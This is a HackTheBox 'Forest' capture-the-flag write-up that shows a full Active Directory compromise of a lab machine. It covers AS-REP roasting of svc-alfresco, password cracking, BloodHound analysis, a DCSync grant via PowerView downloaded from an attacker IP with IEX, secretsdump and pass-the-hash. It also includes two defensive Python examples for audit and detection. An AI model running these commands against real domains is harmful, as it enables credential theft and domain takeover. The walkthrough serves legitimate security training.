
HackTheBox - Forest Writeup

tags: writeup HackTheBox Machine Easy OSCP bloodhound impacket DCsync ASREProast kerbrute AD

Port Scanning

# Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.12s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-14T16:05:13
|_  start_date: 2022-08-14T16:03:38
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-08-14T09:05:14-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 14 11:58:34 2022 -- 1 IP address (1 host up) scanned in 27.49 seconds

Services:

  • Port 53 : Simple DNS Plus
  • Port 88 : Microsoft Windows Kerberos
  • Port 135 : Microsoft Windows RPC
  • Port 139 : Windows Netbios-ssn
  • Port 389 : Windows Active Directory LDAP
  • Port 445 : microsoft-ds Windows Server 2016 Standard 14393
  • 464 : kpasswd5?
  • Port 594 : ncacn_http Microsoft Windows RPC over HTTP
  • Port 636: tcpwrapped
  • Port 3268 : Windows Active Directory LDAP
  • Port 3269 : tcpwrapped

Enumeration

Since Kerberos (port 88) is exposed we can enumerate valid usernames against it, so we are going to use kerbrute to brute-force usernames.

/opt/kerbrute/kerbrute_linux_amd64 userenum --dc HTB.local -d HTB.local /usr/share/seclists/Usernames/Names/names.txt 

After enumerating with this list I discovered these usernames:

  • andy
  • forest
  • lucinda
  • mark
  • sebastien

Looking into these usernames I didn't find anything interesting, so we keep enumerating with enum4linux.

sudo enum4linux -a 10.10.10.161

Reading the results of this tool I noticed that there are more users.


Combining what both tools discovered we have this list.

Usernames:

  • andy@HTB.local
  • forest@HTB.local
  • lucinda@HTB.local
  • mark@HTB.local
  • sebastien@HTB.local
  • santi@HTB.local
  • administrator@HTB.local
  • svc-alfresco@HTB.local

Looking at the usernames, svc-alfresco stands out as a service account, so it may be AS-REP roastable: if Kerberos pre-authentication is disabled on it we can request its AS-REP and crack it offline.

Exploitation

To AS-REP roast the account we are going to use impacket's GetNPUsers:

impacket-GetNPUsers HTB.local/svc-alfresco -no-pass


We receive the AS-REP (the reply carrying the TGT, encrypted with the user's key), and now we can try to crack it with john.

We have to put the Kerberos hash into a file and use the following command to crack it.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

We receive the following result:

s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

Now that we know the user and the password we can use evil-winrm to obtain a shell as svc-alfresco with the following command:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

After that we have a shell as svc-alfresco; for more info about evil-winrm go to its GitHub.
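The defensive side of the AS-REP roast above, added here as an example that is not part of the original writeup: an audit over userAccountControl values (constructed sample entries shaped like an LDAP search result, not data from the box) that lists enabled accounts with pre-authentication disabled, which is exactly the condition GetNPUsers relies on, and shows the bit to clear to remediate it.

```python
from typing import Dict, List

# userAccountControl bits relevant to AS-REP roasting.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# Constructed sample entries (values chosen for this example).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc-alfresco",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "mark", "userAccountControl": UF_NORMAL_ACCOUNT},
    # Disabled account: not roastable right now, but the flag should still be cleared.
    {"sAMAccountName": "oldsvc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
]


def decode_uac(uac: int) -> List[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if uac & bit]


def asrep_roastable(entries: List[Dict]) -> List[str]:
    """Enabled accounts with pre-authentication disabled, i.e. what GetNPUsers would find."""
    hits = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            hits.append(entry["sAMAccountName"])
    return sorted(hits)


def clear_preauth_flag(uac: int) -> int:
    """Value to write back to userAccountControl so pre-authentication is required again."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ENTRIES):
        print(f"AS-REP roastable: {name}")
```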


Now it's time to enumerate and find the way to obtain Administrator privileges.


⏫Root Privesc

Since this is an Active Directory box we start enumerating with BloodHound. With the svc-alfresco credentials we can use the bloodhound-python ingestor, which runs remotely so we don't need to upload any file to the machine:

bloodhound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d HTB.local -c All

This generates a few JSON files on our machine that we have to upload to BloodHound, as shown in my previous BloodHound post.

After uploading them into BloodHound and running the query "Shortest Paths to Domain Admins" we see this.


We have to right click on HTB.local and click Set as Ending Node:


After that we obtain this graph, which shows us the path for the privilege escalation.


Looking at the graph we see that we have to become a member of 'EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL' to be able to use WriteDacl and obtain Admin privileges. So by adding the svc-alfresco user to the EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group we can leverage this account and try to dump the NTLM hashes.

Right-clicking on the WriteDacl edge in BloodHound and clicking Help, the Abuse Info tab explains how to abuse it to obtain DCSync; in my case I recommend looking at a web guide like this one.

Reading the Abuse Info and the guide on the web we see that we have to follow these steps:

  1. Import PowerView
  2. Add-DomainGroupMember (add svc-alfresco to EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)
  3. Create the pass object.
  4. Create the Credential Object.
  5. And the last, Add-DomainObjectAcl

After that we should be able to dump the credential hashes from the DC. These are the commands that you have to enter.

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/PowerView.ps1')

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; 

$pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $pass)

Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity "HTB.LOCAL\Domain Admins" -Rights DCSync
Fail attempt

If adding the user to Exchange Windows Permissions doesn't work, you have to make a script that executes everything at once. In my case I found it after doing the machine, in the 0xdf writeup.

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

After executing the commands or the script we can use impacket-secretsdump, which uses the DCSync rights we just granted, to dump the domain credential hashes with the following command:

impacket-secretsdump HTB.local/svc-alfresco:s3rvice@10.10.10.161
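The secretsdump step above is a DCSync: the account asks the DC for replication data as if it were another domain controller. Added here as a detection example that is not part of the writeup, run over constructed sample records: a check over Security event 4662 on the DC that flags the replication control-access rights being exercised by anything other than a machine account (a stricter version would compare against the actual list of DCs).

```python
import re
from typing import Dict, List, Tuple

# Control-access right GUIDs a DCSync needs; they show up in the
# Properties field of event 4662 on the domain controller.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-f-]{36})\}?", re.I)

# Constructed sample events shaped like parsed 4662 records (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "SubjectDomainName": "HTB",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "mark", "SubjectDomainName": "HTB",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "%%7688\n\t{bf967a7f-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties: str) -> List[str]:
    """Names of DCSync-related rights referenced by a 4662 Properties field."""
    guids = [g.lower() for g in GUID_RE.findall(properties)]
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]


def detect_dcsync(events: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Flag replication rights used by a non-machine principal (machine accounts end in '$')."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev["SubjectUserName"]
        rights = replication_rights_in(ev.get("Properties", ""))
        if rights and not user.endswith("$"):
            alerts.append((user, rights))
    return alerts


if __name__ == "__main__":
    for user, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {user}: {', '.join(rights)}")
```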

We receive something like this:

If you look at the entire hash line you can see that it is an NTLMv1 hash, so we can pass-the-hash to the Administrator account.

Using evil-winrm we can pass the hash and obtain an Administrator shell:

evil-winrm -i 10.10.10.161 -u Administrator -H NT_Hash

And that's all folks, we obtained Administrator privileges! Check my media!


You can find me on:

Twitter
Github
TryHackMe
HackTheBox